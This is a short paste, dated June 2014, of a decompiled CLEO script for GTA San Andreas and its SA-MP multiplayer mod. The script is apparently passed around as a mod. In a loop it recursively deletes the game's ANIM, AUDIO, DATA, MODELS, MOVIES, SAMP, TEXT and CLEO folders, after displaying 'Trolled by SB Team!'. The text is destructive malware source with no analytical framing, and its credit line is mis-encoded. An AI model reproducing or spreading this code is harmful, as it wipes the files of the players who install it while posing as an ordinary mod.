

Jun 18th, 2014
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  1. // This FILE was decompiled using SASCM.ini published by GTAG ( ON 14.6.2013
  2. {$CLEO .CS}
  3. {$INCLUDE SF}
  4. {$NOSOURCE}
  6. //-------------MAIN---------------
  7. 0000: NOP
  8. 0662: printstring "CLEO Ñäåëàí ñêðèïòåðîì > xXx2o1o | CLEO by xXx2o1o"
  9. 03A4: name_thread "ByxXx2o1o"
  10. 0ACD: show_text_highpriority "~R~Trolled by SB Team! ~W~:)" time 1000
  11. 0001: wait 1000 ms
  12. 0002: jump @ByxXx2o1o_113
  14. :ByxXx2o1o_113
  15. 0001: wait 0 ms
  16. 00D6: if
  17. 056D:   actor $PLAYER_ACTOR defined
  18. 004D: jump_if_false @ByxXx2o1o_113
  19. 0B01: delete_directory 'ANIM' with_all_files_and_subdirectories 1 // IF AND SET
  20. 0001: wait 10 ms
  21. 0B01: delete_directory 'AUDIO' with_all_files_and_subdirectories 1 // IF AND SET
  22. 0001: wait 10 ms
  23. 0B01: delete_directory 'DATA' with_all_files_and_subdirectories 1 // IF AND SET
  24. 0001: wait 10 ms
  25. 0B01: delete_directory 'MODELS' with_all_files_and_subdirectories 1 // IF AND SET
  26. 0001: wait 10 ms
  27. 0B01: delete_directory 'MOVIES' with_all_files_and_subdirectories 1 // IF AND SET
  28. 0001: wait 10 ms
  29. 0B01: delete_directory 'SAMP' with_all_files_and_subdirectories 1 // IF AND SET
  30. 0001: wait 10 ms
  31. 0B01: delete_directory 'TEXT' with_all_files_and_subdirectories 1 // IF AND SET
  32. 0001: wait 10 ms
  33. 0B01: delete_directory 'CLEO' with_all_files_and_subdirectories 1 // IF AND SET
  34. 0001: wait 10 ms
  35. 0002: jump @ByxXx2o1o_113
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